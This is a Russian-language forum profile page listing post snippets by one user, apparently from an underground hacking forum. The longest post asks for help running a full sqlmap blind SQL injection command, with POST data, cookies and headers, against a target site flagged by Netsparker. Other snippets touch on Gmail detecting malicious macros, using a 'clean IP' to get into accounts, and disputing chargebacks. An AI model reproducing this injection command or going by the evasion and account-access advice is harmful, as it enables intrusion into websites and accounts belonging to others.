Перейти к содержанию

Woxo

Пользователь
  • Публикаций

    8
  • Зарегистрирован

  • Посещение

Репутация

68 Excellent

Информация о Woxo

  • Звание
    Rank №1
  1. help sqlmap

    Подскажите по sqlmap Сканер "Netsparker" выдал Blind SQL Injection Беру команду Netsparker Спойлер sqlmap.py -u "https://site.com/main.aspx?support=yes" -p "iddy089090097033042088065009077" --risk="3" --prefix="';" --level="3" --method="POST" --data="--97ad69b667424fada5eb9247f4a9cdd9Content-Disposition: form-data; name=%22__EVENTTARGET%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22__EVENTARGUMENT%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22__VIEWSTATE%22 /wEPDwUKLTUxMTcwNzgxMGRkHjhKs49VnLropAmsOF5Db88F0nw= --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22__VIEWSTATEGENERATOR%22 202EA31B --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22__EVENTVALIDATION%22 /wEWBQL1opJEAtK+4dYCAoGJvaAHAoWVltwPAtSalOYCT6+hFRNyww4iUs8JfgiSx164QWA= --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22bdd_y072106098034048087050004078089001091097098%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22bdd_y072106098034048087050018078103021088099087028040094070005091%22 Sign in to Your Account? --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22iddy089105083030%22 RequestSupportOffline --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22iddy089090097033042088065009077%22 test --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22iddy091104083032042077%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22iddy089110097034038086060004%22 192_119_166_45_1601234026 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22deviceidtax%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22deviceidhidden%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22timezoneoffsethidden%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22systemtshidden%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22userAgent%22 Smith --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22language%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22platform%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22iddy057106094030048091071114078100021075104098013010077%22 1 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22bdd_y072106098034048087050018078103021088099097034038089%22 3 --97ad69b667424fada5eb9247f4a9cdd9 Content-Disposition: form-data; name=%22bdd_y072106098034048087050019094099016085103098032038090072005092103%22 3 --97ad69b667424fada5eb9247f4a9cdd9-- " --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36" --cookie="ASP.NET_SessionId=bzuf3x45bziqnzvxud242byp; paper1065gd=192.119.166.45" --headers="Host:site.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:multipart/form-data; boundary=97ad69b667424fada5eb9247f4a9cdd9\nReferer:https://site.com/main.aspx?support=yes\nX-Scanner:Netsparker" --dbms="Microsoft SQL Server" --batch но SQLMAP выдает ошибку [CRITICAL] all testable parameters you provided are not present within the given request data Но в сканере показует базу,
  2. Open Source

    Я думаю у тебя паранойя) без обид
  3. это самый быстрый вариант и лучший вариант
  4. [Макросня][Gmail]

    Сколько раз слал если есть хоть один детект AV gmail сразу палит.
  5. Так почитай на форуме куча инфы )
  6. нужен чистый ip и все пускает в акк
  7. Я наверное некорректно сформулировал вопрос... Сейчас принимаем платежи от клиентов на PayPal, но Покупатель,получив отвал запросто отзывает платёж и потом невозможно доказать, что товар он получил. Какая платёжка позволяет избежать чарджбеков? Все даже очень просто фотка пака с адресом получателя трекр на его имя
×